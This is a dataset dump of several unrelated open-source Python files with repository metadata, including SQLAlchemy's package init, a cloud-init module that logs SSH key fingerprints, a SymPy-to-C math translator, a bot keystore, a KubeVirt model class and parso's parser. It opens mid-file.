for plugin in _plugins:
try:
avc = plugin.Vc(location)
l = len(avc.root)
if l == max_len:
vcs.append(avc)
elif l > max_len:
max_len = l
vcs = [avc]
except ValueError:
pass
if not vcs:
# No plugin recognized that location, fallback to _null
return [_null.Vc(location)]
vc_sort_key = lambda v: vc_sort_order.index(v.NAME)
vcs.sort(key=vc_sort_key)
return vcs
| gpl-2.0 | 4,926,562,048,158,405,000 | 32.645833 | 78 | 0.64644 | false |
Widiot/simpleblog | venv/lib/python3.5/site-packages/sqlalchemy/__init__.py | 1 | 2218 | # sqlalchemy/__init__.py
# Copyright (C) 2005-2017 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from .sql import (
alias,
all_,
and_,
any_,
asc,
between,
bindparam,
case,
cast,
collate,
column,
delete,
desc,
distinct,
except_,
except_all,
exists,
extract,
false,
func,
funcfilter,
insert,
intersect,
intersect_all,
join,
lateral,
literal,
literal_column,
modifier,
not_,
null,
or_,
outerjoin,
outparam,
over,
select,
subquery,
table,
tablesample,
text,
true,
tuple_,
type_coerce,
union,
union_all,
update,
within_group,
)
from .types import (
ARRAY,
BIGINT,
BINARY,
BLOB,
BOOLEAN,
BigInteger,
Binary,
Boolean,
CHAR,
CLOB,
DATE,
DATETIME,
DECIMAL,
Date,
DateTime,
Enum,
FLOAT,
Float,
INT,
INTEGER,
Integer,
Interval,
JSON,
LargeBinary,
NCHAR,
NVARCHAR,
NUMERIC,
Numeric,
PickleType,
REAL,
SMALLINT,
SmallInteger,
String,
TEXT,
TIME,
TIMESTAMP,
Text,
Time,
TypeDecorator,
Unicode,
UnicodeText,
VARBINARY,
VARCHAR,
)
from .schema import (
CheckConstraint,
Column,
ColumnDefault,
Constraint,
DefaultClause,
FetchedValue,
ForeignKey,
ForeignKeyConstraint,
Index,
MetaData,
PassiveDefault,
PrimaryKeyConstraint,
Sequence,
Table,
ThreadLocalMetaData,
UniqueConstraint,
DDL,
BLANK_SCHEMA
)
from .inspection import inspect
from .engine import create_engine, engine_from_config
__version__ = '1.1.15'
def __go(lcls):
global __all__
from . import events
from . import util as _sa_util
import inspect as _inspect
__all__ = sorted(name for name, obj in lcls.items()
if not (name.startswith('_') or _inspect.ismodule(obj)))
_sa_util.dependencies.resolve_all("sqlalchemy")
__go(locals())
| mit | 8,256,549,886,487,883,000 | 14.191781 | 77 | 0.583859 | false |
cbuben/cloud-init | cloudinit/config/cc_ssh_authkey_fingerprints.py | 1 | 3690 | # vi: ts=4 expandtab
#
# Copyright (C) 2012 Yahoo! Inc.
#
# Author: Joshua Harlow <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3, as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import base64
import hashlib
from prettytable import PrettyTable
# Ensure this is aliased to a name not 'distros'
# since the module attribute 'distros'
# is a list of distros that are supported, not a sub-module
from cloudinit import distros as ds
from cloudinit import ssh_util
from cloudinit import util
def _split_hash(bin_hash):
split_up = []
for i in xrange(0, len(bin_hash), 2):
split_up.append(bin_hash[i:i + 2])
return split_up
def _gen_fingerprint(b64_text, hash_meth='md5'):
if not b64_text:
return ''
# TBD(harlowja): Maybe we should feed this into 'ssh -lf'?
try:
hasher = hashlib.new(hash_meth)
hasher.update(base64.b64decode(b64_text))
return ":".join(_split_hash(hasher.hexdigest()))
except (TypeError, ValueError):
# Raised when b64 not really b64...
# or when the hash type is not really
# a known/supported hash type...
return '?'
def _is_printable_key(entry):
if any([entry.keytype, entry.base64, entry.comment, entry.options]):
if (entry.keytype and
entry.keytype.lower().strip() in ['ssh-dss', 'ssh-rsa']):
return True
return False
def _pprint_key_entries(user, key_fn, key_entries, hash_meth='md5',
prefix='ci-info: '):
if not key_entries:
message = ("%sno authorized ssh keys fingerprints found for user %s.\n"
% (prefix, user))
util.multi_log(message)
return
tbl_fields = ['Keytype', 'Fingerprint (%s)' % (hash_meth), 'Options',
'Comment']
tbl = PrettyTable(tbl_fields)
for entry in key_entries:
if _is_printable_key(entry):
row = []
row.append(entry.keytype or '-')
row.append(_gen_fingerprint(entry.base64, hash_meth) or '-')
row.append(entry.options or '-')
row.append(entry.comment or '-')
tbl.add_row(row)
authtbl_s = tbl.get_string()
authtbl_lines = authtbl_s.splitlines()
max_len = len(max(authtbl_lines, key=len))
lines = [
util.center("Authorized keys from %s for user %s" %
(key_fn, user), "+", max_len),
]
lines.extend(authtbl_lines)
for line in lines:
util.multi_log(text="%s%s\n" % (prefix, line),
stderr=False, console=True)
def handle(name, cfg, cloud, log, _args):
if util.is_true(cfg.get('no_ssh_fingerprints', False)):
log.debug(("Skipping module named %s, "
"logging of ssh fingerprints disabled"), name)
return
hash_meth = util.get_cfg_option_str(cfg, "authkey_hash", "md5")
(users, _groups) = ds.normalize_users_groups(cfg, cloud.distro)
for (user_name, _cfg) in users.items():
(key_fn, key_entries) = ssh_util.extract_authorized_keys(user_name)
_pprint_key_entries(user_name, key_fn,
key_entries, hash_meth)
| gpl-3.0 | 5,022,524,162,396,625,000 | 34.142857 | 79 | 0.615989 | false |
vincent-noel/libSigNetSim | libsignetsim/cwriter/CMathWriter.py | 1 | 12709 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2014-2017 Vincent Noel ([email protected])
#
# This file is part of libSigNetSim.
#
# libSigNetSim is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# libSigNetSim is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with libSigNetSim. If not, see <http://www.gnu.org/licenses/>.
"""
This file ...
"""
from __future__ import print_function
from sympy import simplify, srepr
from libsignetsim.model.math.sympy_shortcuts import *
from libsignetsim.settings.Settings import Settings
from libsignetsim.model.math.MathException import MathException, DelayNotImplemented
class CMathWriter(object):
""" Class for handling math formulaes """
MATH_ERR = -1
MATH_SBML = 0
MATH_INTERNAL = 1
MATH_DEVINTERNAL = 2
MATH_C = 3
MATH_PRETTYPRINT = 4
MATH_FORMULA = 20
MATH_EQUATION = 21
MATH_VARIABLE = 22
MATH_KINETICLAW = 23
MATH_FUNCTION = 24
MATH_RATERULE = 25
MATH_EVENTASSIGNMENT= 26
MATH_ASSIGNMENTRULE = 27
MATH_ALGEBRAICRULE = 28
ZERO = SympyInteger(0)
def __init__(self, model):
""" Constructor """
self.model = model
def writeCCode(self, tree):
math = self.translateForC(tree)
if Settings.verbose >= 2:
print("\n> writeCCode")
print(">> input : %s" % srepr(tree))
print(">> input simplified : %s" % str(tree))
print(">> output : %s" % math)
return math
def translateVariableForC(self, variable, derivative=False):
""" Translates a Sympy symbol in C """
if str(variable) == "_time_":
return "t"
elif str(variable) == "_avogadro_":
return "RT_NA"
t_var = None
if self.model.listOfVariables.containsSymbol(variable):
t_var = self.model.listOfVariables.getBySymbol(variable)
else:
print("> Err : %s" % str(variable))
t_pos = None
if t_var.isDerivative():
if derivative:
c_var = "ydot"
else:
c_var = "y"
t_pos = t_var.ind+1
elif t_var.isAssignment():
c_var = "ass"
t_pos = t_var.ind+1
elif t_var.isConstant():
c_var = "cst"
t_pos = t_var.ind+1
elif t_var.isAlgebraic():
if derivative:
c_var = "ydot"
else:
c_var = "y"
t_pos = self.model.nbOdes + t_var.ind+1
else:
raise MathException("Cannot determine the mathematical type of variable %s" % str(variable))
return "Ith(%s,%s)" % (c_var, t_pos)
def translateForC(self, tree):
""" Translate a sympy tree into a C string """
if isinstance(tree, int):
return "RCONST(%d.0)" % tree
elif isinstance(tree, float):
t_string = "%.16g" % tree
if "." not in t_string and "e" not in t_string:
t_string += ".0"
return "RCONST(%s)" % t_string
elif tree.func == SympySymbol:
return self.translateVariableForC(tree)
elif tree.func == SympyDerivative:
return self.translateVariableForC(tree.args[0], derivative=True)
elif tree.func == SympyInteger:
return "RCONST(%d.0)" % int(tree)
elif tree.func == SympyFloat:
t_string = "%.16g" % float(tree)
if "." not in t_string and "e" not in t_string:
t_string += ".0"
return "RCONST(%s)" % t_string
elif tree.func == SympyRational:
return "(%s/%s)" % (self.translateForC(tree.p), self.translateForC(tree.q))
elif tree.func == SympyNegOne:
return "RCONST(-1.0)"
elif tree.func == SympyOne:
return "RCONST(1.0)"
elif tree.func == SympyHalf:
return "RCONST(0.5)"
elif tree.func == SympyZero:
return "RCONST(0.0)"
elif tree == SympyPi:
return "RT_PI"
elif tree.func == SympyE or tree.func == SympyExp1:
return "RT_E"
elif tree == SympyInf:
return "RT_INF"
elif tree == -SympyInf:
return "-RT_INF"
elif tree == SympyNan:
return "RT_NAN"
elif tree == SympyTrue or tree == True:
return "1"
elif tree == SympyFalse or tree == False:
return "0"
elif tree.func == SympyMax:
return "max(%s, %s)" % (
self.translateForC(tree.args[0]),
self.translateForC(tree.args[1])
)
elif tree.func == SympyAdd:
t_add = "("
for i_arg, arg in enumerate(tree.args):
if i_arg > 0:
t_add = t_add + " + "
t_add = t_add + self.translateForC(arg)
return t_add + ")"
elif tree.func == SympyMul:
if len(tree.args) == 2:
if tree.args[0].func == SympyNegOne:
return "-" + self.translateForC(tree.args[1])
if tree.args[1].func == SympyNegOne:
return "-" + self.translateForC(tree.args[0])
started = False
t_minus = ""
t_mul = ""
t_divider = ""
for i_arg, arg in enumerate(tree.args):
if arg.func == SympyNegOne:
t_mul = "-" + t_mul
elif arg.func == SympyPow and arg.args[1].func == SympyNegOne:
if t_divider == "":
t_divider = "%s" % self.translateForC(arg.args[0])
else:
t_divider += "*%s" % self.translateForC(arg.args[0])
else:
if started:
t_mul += "*"
started = True
t_mul += self.translateForC(arg)
if t_divider == "":
return t_mul
else:
return t_minus + "(" + t_mul + "/(%s))" % t_divider
# AST_FUNCTION_ABS
elif tree.func == SympyAbs:
return "rt_abs(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_QUOTIENT
elif tree.func == SympyQuotient:
return "((int) rt_floor(%s/%s))" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
# AST_FUNCTION_REM
elif tree.func == SympyRem:
return "((int) fmod(%s, %s))" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
# AST_FUNCTION_ARCCOS
elif tree.func == SympyAcos:
return "rt_acos(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCCOSH
elif tree.func == SympyAcosh:
return "rt_acosh(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCCOT
elif tree.func == SympyAcot:
return "rt_acot(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCCSC
elif tree.func == SympyAcsc:
return "rt_acsc(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCCOTH
elif tree.func == SympyAcoth:
return "rt_acoth(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCSIN
elif tree.func == SympyAsec:
return "rt_asec(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCSIN
elif tree.func == SympyAsin:
return "rt_asin(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCSINH
elif tree.func == SympyAsinh:
return "rt_asinh(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCTAN
elif tree.func == SympyAtan:
return "rt_atan(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCTANH
elif tree.func == SympyAtanh:
return "rt_atanh(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_CEILING
elif tree.func == SympyCeiling:
return "rt_ceil(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_COS
elif tree.func == SympyCos:
return "rt_cos(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_COSH
elif tree.func == SympyCosh:
return "rt_cosh(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_COT
elif tree.func == SympyCot:
return "rt_cot(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_COTH
elif tree.func == SympyCoth:
return "rt_coth(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_CSC
elif tree.func == SympyCsc:
return "rt_csc(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_DELAY
#TODO
#SEE BELOW !
# AST_FUNCTION_EXP
elif tree.func == SympyExp:
return "rt_exp(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_FACTORIAL
elif tree.func == SympyFactorial:
return "rt_factorial(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_FLOOR
elif tree.func == SympyFloor:
return "rt_floor(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_LOG
elif tree.func == SympyLog:
if len(tree.args) == 2:
return "(rt_log(%s)/rt_log(%s))" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
else:
return "rt_log(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_PIECEWISE
elif tree.func == SympyPiecewise:
(t_val, t_cond) = tree.args[0]
line = "(%s?%s" % (self.translateForC(t_cond), self.translateForC(t_val))
line_end = ")"
for piece in range(1, len(tree.args)):
(t_val, t_cond) = tree.args[piece]
line = line + ":(%s?%s" % (self.translateForC(t_cond), self.translateForC(t_val))
line_end = line_end + ")"
line = line + ":(RCONST(0.0))" + line_end
return line
# AST_FUNCTION_PIECEWISE
elif tree.func == SympyITE:
t_cond = tree.args[0]
t_val = tree.args[1]
t_other_val = tree.args[2]
line = "(%s?%s:%s)" % (self.translateForC(t_cond), self.translateForC(t_val), self.translateForC(t_other_val))
return line
# AST_FUNCTION_POWER
elif tree.func == SympyPow:
if len(tree.args) == 2 and tree.args[1].func == SympyNegOne:
return "RCONST(1.0)/(%s)" % self.translateForC(tree.args[0])
return "rt_pow(%s, %s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
# AST_FUNCTION_ROOT
elif tree.func == SympyRoot:
return "rt_pow(%s,(RCONST(1.0)/%s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
# AST_FUNCTION_SEC
elif tree.func == SympySec:
return "rt_sec(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_SIN
elif tree.func == SympySin:
return "rt_sin(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_SINH
elif tree.func == SympySinh:
return "rt_sinh(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_TAN
elif tree.func == SympyTan:
return "rt_tan(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_TANH
elif tree.func == SympyTanh:
return "rt_tanh(%s)" % self.translateForC(tree.args[0])
elif tree.func == SympyEqual:
return "rt_eq(%s, %s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
elif tree.func == SympyUnequal:
return "rt_neq(%s, %s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
elif tree.func == SympyGreaterThan:
return "rt_geq(%s, %s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
elif tree.func == SympyLessThan:
return "rt_leq(%s, %s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
elif tree.func == SympyStrictGreaterThan:
return "rt_gt(%s, %s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
elif tree.func == SympyStrictLessThan:
return "rt_lt(%s, %s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
elif tree.func == SympyAnd:
t_args = "("
for i_arg in range(0, len(tree.args)):
if i_arg > 0:
t_args = t_args + " && "
t_args = t_args + self.translateForC(tree.args[i_arg])
return t_args + ")"
elif tree.func == SympyOr:
t_args = "("
for i_arg in range(0, len(tree.args)):
if i_arg > 0:
t_args = t_args + " || "
t_args = t_args + self.translateForC(tree.args[i_arg])
return t_args + ")"
elif tree.func == SympyXor:
return self.translateForC(simplify(tree))
elif tree.func == SympyNot:
return "(!%s)" % self.translateForC(tree.args[0])
elif tree.func == SympyImplies:
# p -> q == !p || q
# print srepr(tree)
# print tree.evalf()
return "(!" + self.translateForC(tree.args[0]) + " || " + self.translateForC(tree.args[1]) + ")"
elif tree.func == SympyUnevaluatedMin:
if len(tree.args) == 1:
return self.translateForC(tree.args[0])
elif len(tree.args) > 1:
str = "min(" + self.translateForC(tree.args[0]) + ", " + self.translateForC(tree.args[1]) + ")"
for i, arg in enumerate(tree.args):
if i > 1:
str = "min(" + str + ", " + self.translateForC(tree.args[i]) + ")"
return str
elif tree.func == SympyUnevaluatedMax:
if len(tree.args) == 1:
return self.translateForC(tree.args[0])
elif len(tree.args) > 1:
str = "max(" + self.translateForC(tree.args[0]) + ", " + self.translateForC(tree.args[1]) + ")"
for i, arg in enumerate(tree.args):
if i > 1:
str = "max(" + str + ", " + self.translateForC(tree.args[i]) + ")"
return str
elif tree.func == SympyFunction:
raise DelayNotImplemented()
else:
raise MathException("C Math Writer : Unknown Sympy Symbol %s" % str(tree))
return str(tree)
| gpl-3.0 | -8,722,728,192,466,864,000 | 25.868922 | 113 | 0.634354 | false |
Watchful1/RedditSubsBot | src/database/_keystore.py | 1 | 1342 | import discord_logging
import utils
from classes.key_value import KeyValue
log = discord_logging.get_logger()
class _DatabaseKeystore:
def __init__(self):
self.session = self.session # for pycharm linting
self.log_debug = self.log_debug
def save_keystore(self, key, value):
if self.log_debug:
log.debug(f"Saving keystore: {key} : {value}")
self.session.merge(KeyValue(key, value))
def get_keystore(self, key):
if self.log_debug:
log.debug(f"Fetching keystore: {key}")
key_value = self.session.query(KeyValue).filter_by(key=key).first()
if key_value is None:
if self.log_debug:
log.debug("Key not found")
return None
if self.log_debug:
log.debug(f"Value: {key_value.value}")
return key_value.value
def save_datetime(self, key, date_time):
self.save_keystore(key, utils.get_datetime_string(date_time))
def get_datetime(self, key, is_date=False):
result = self.get_keystore(key)
if result is None:
return None
else:
result_date = utils.parse_datetime_string(result)
if is_date:
return result_date.date()
else:
return result_date
def get_or_init_datetime(self, key):
result = self.get_datetime(key)
if result is None:
log.warning(f"Initializing key {key} to now")
now = utils.datetime_now()
self.save_datetime(key, now)
return now
return result
| mit | -628,551,014,755,818,100 | 23.851852 | 69 | 0.695976 | false |
kubevirt/client-python | kubevirt/models/v1beta1_data_volume_blank_image.py | 1 | 2409 | # coding: utf-8
"""
KubeVirt API
This is KubeVirt API an add-on for Kubernetes.
OpenAPI spec version: 1.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1beta1DataVolumeBlankImage(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
}
attribute_map = {
}
def __init__(self):
"""
V1beta1DataVolumeBlankImage - a model defined in Swagger
"""
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1beta1DataVolumeBlankImage):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| apache-2.0 | -3,823,461,405,543,961,600 | 23.333333 | 77 | 0.514321 | false |
lmregus/Portfolio | python/design_patterns/env/lib/python3.7/site-packages/parso/python/parser.py | 1 | 8593 | from parso.python import tree
from parso.python.token import PythonTokenTypes
from parso.parser import BaseParser
NAME = PythonTokenTypes.NAME
INDENT = PythonTokenTypes.INDENT
DEDENT = PythonTokenTypes.DEDENT
class Parser(BaseParser):
"""
This class is used to parse a Python file, it then divides them into a
class structure of different scopes.
:param pgen_grammar: The grammar object of pgen2. Loaded by load_grammar.
"""
node_map = {
'expr_stmt': tree.ExprStmt,
'classdef': tree.Class,
'funcdef': tree.Function,
'file_input': tree.Module,
'import_name': tree.ImportName,
'import_from': tree.ImportFrom,
'break_stmt': tree.KeywordStatement,
'continue_stmt': tree.KeywordStatement,
'return_stmt': tree.ReturnStmt,
'raise_stmt': tree.KeywordStatement,
'yield_expr': tree.YieldExpr,
'del_stmt': tree.KeywordStatement,
'pass_stmt': tree.KeywordStatement,
'global_stmt': tree.GlobalStmt,
'nonlocal_stmt': tree.KeywordStatement,
'print_stmt': tree.KeywordStatement,
'assert_stmt': tree.AssertStmt,
'if_stmt': tree.IfStmt,
'with_stmt': tree.WithStmt,
'for_stmt': tree.ForStmt,
'while_stmt': tree.WhileStmt,
'try_stmt': tree.TryStmt,
'comp_for': tree.CompFor,
# Not sure if this is the best idea, but IMO it's the easiest way to
# avoid extreme amounts of work around the subtle difference of 2/3
# grammar in list comoprehensions.
'list_for': tree.CompFor,
# Same here. This just exists in Python 2.6.
'gen_for': tree.CompFor,
'decorator': tree.Decorator,
'lambdef': tree.Lambda,
'old_lambdef': tree.Lambda,
'lambdef_nocond': tree.Lambda,
}
default_node = tree.PythonNode
# Names/Keywords are handled separately
_leaf_map = {
PythonTokenTypes.STRING: tree.String,
PythonTokenTypes.NUMBER: tree.Number,
PythonTokenTypes.NEWLINE: tree.Newline,
PythonTokenTypes.ENDMARKER: tree.EndMarker,
PythonTokenTypes.FSTRING_STRING: tree.FStringString,
PythonTokenTypes.FSTRING_START: tree.FStringStart,
PythonTokenTypes.FSTRING_END: tree.FStringEnd,
}
def __init__(self, pgen_grammar, error_recovery=True, start_nonterminal='file_input'):
super(Parser, self).__init__(pgen_grammar, start_nonterminal,
error_recovery=error_recovery)
self.syntax_errors = []
self._omit_dedent_list = []
self._indent_counter = 0
def parse(self, tokens):
if self._error_recovery:
if self._start_nonterminal != 'file_input':
raise NotImplementedError
tokens = self._recovery_tokenize(tokens)
return super(Parser, self).parse(tokens)
def convert_node(self, nonterminal, children):
"""
Convert raw node information to a PythonBaseNode instance.
This is passed to the parser driver which calls it whenever a reduction of a
grammar rule produces a new complete node, so that the tree is build
strictly bottom-up.
"""
try:
node = self.node_map[nonterminal](children)
except KeyError:
if nonterminal == 'suite':
# We don't want the INDENT/DEDENT in our parser tree. Those
# leaves are just cancer. They are virtual leaves and not real
# ones and therefore have pseudo start/end positions and no
# prefixes. Just ignore them.
children = [children[0]] + children[2:-1]
elif nonterminal == 'list_if':
# Make transitioning from 2 to 3 easier.
nonterminal = 'comp_if'
elif nonterminal == 'listmaker':
# Same as list_if above.
nonterminal = 'testlist_comp'
node = self.default_node(nonterminal, children)
for c in children:
c.parent = node
return node
def convert_leaf(self, type, value, prefix, start_pos):
# print('leaf', repr(value), token.tok_name[type])
if type == NAME:
if value in self._pgen_grammar.reserved_syntax_strings:
return tree.Keyword(value, start_pos, prefix)
else:
return tree.Name(value, start_pos, prefix)
return self._leaf_map.get(type, tree.Operator)(value, start_pos, prefix)
def error_recovery(self, token):
tos_nodes = self.stack[-1].nodes
if tos_nodes:
last_leaf = tos_nodes[-1].get_last_leaf()
else:
last_leaf = None
if self._start_nonterminal == 'file_input' and \
(token.type == PythonTokenTypes.ENDMARKER
or token.type == DEDENT and '\n' not in last_leaf.value
and '\r' not in last_leaf.value):
# In Python statements need to end with a newline. But since it's
# possible (and valid in Python ) that there's no newline at the
# end of a file, we have to recover even if the user doesn't want
# error recovery.
if self.stack[-1].dfa.from_rule == 'simple_stmt':
try:
plan = self.stack[-1].dfa.transitions[PythonTokenTypes.NEWLINE]
except KeyError:
pass
else:
if plan.next_dfa.is_final and not plan.dfa_pushes:
# We are ignoring here that the newline would be
# required for a simple_stmt.
self.stack[-1].dfa = plan.next_dfa
self._add_token(token)
return
if not self._error_recovery:
return super(Parser, self).error_recovery(token)
def current_suite(stack):
# For now just discard everything that is not a suite or
# file_input, if we detect an error.
for until_index, stack_node in reversed(list(enumerate(stack))):
# `suite` can sometimes be only simple_stmt, not stmt.
if stack_node.nonterminal == 'file_input':
break
elif stack_node.nonterminal == 'suite':
# In the case where we just have a newline we don't want to
# do error recovery here. In all other cases, we want to do
# error recovery.
if len(stack_node.nodes) != 1:
break
return until_index
until_index = current_suite(self.stack)
if self._stack_removal(until_index + 1):
self._add_token(token)
else:
typ, value, start_pos, prefix = token
if typ == INDENT:
# For every deleted INDENT we have to delete a DEDENT as well.
# Otherwise the parser will get into trouble and DEDENT too early.
self._omit_dedent_list.append(self._indent_counter)
error_leaf = tree.PythonErrorLeaf(typ.name, value, start_pos, prefix)
self.stack[-1].nodes.append(error_leaf)
tos = self.stack[-1]
if tos.nonterminal == 'suite':
# Need at least one statement in the suite. This happend with the
# error recovery above.
try:
tos.dfa = tos.dfa.arcs['stmt']
except KeyError:
# We're already in a final state.
pass
def _stack_removal(self, start_index):
all_nodes = [node for stack_node in self.stack[start_index:] for node in stack_node.nodes]
if all_nodes:
node = tree.PythonErrorNode(all_nodes)
for n in all_nodes:
n.parent = node
self.stack[start_index - 1].nodes.append(node)
self.stack[start_index:] = []
return bool(all_nodes)
def _recovery_tokenize(self, tokens):
for token in tokens:
typ = token[0]
if typ == DEDENT:
# We need to count indents, because if we just omit any DEDENT,
# we might omit them in the wrong place.
o = self._omit_dedent_list
if o and o[-1] == self._indent_counter:
o.pop()
continue
self._indent_counter -= 1
elif typ == INDENT:
self._indent_counter += 1
yield token
| mit | 5,602,873,020,152,564,000 | 38.417431 | 98 | 0.56837 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.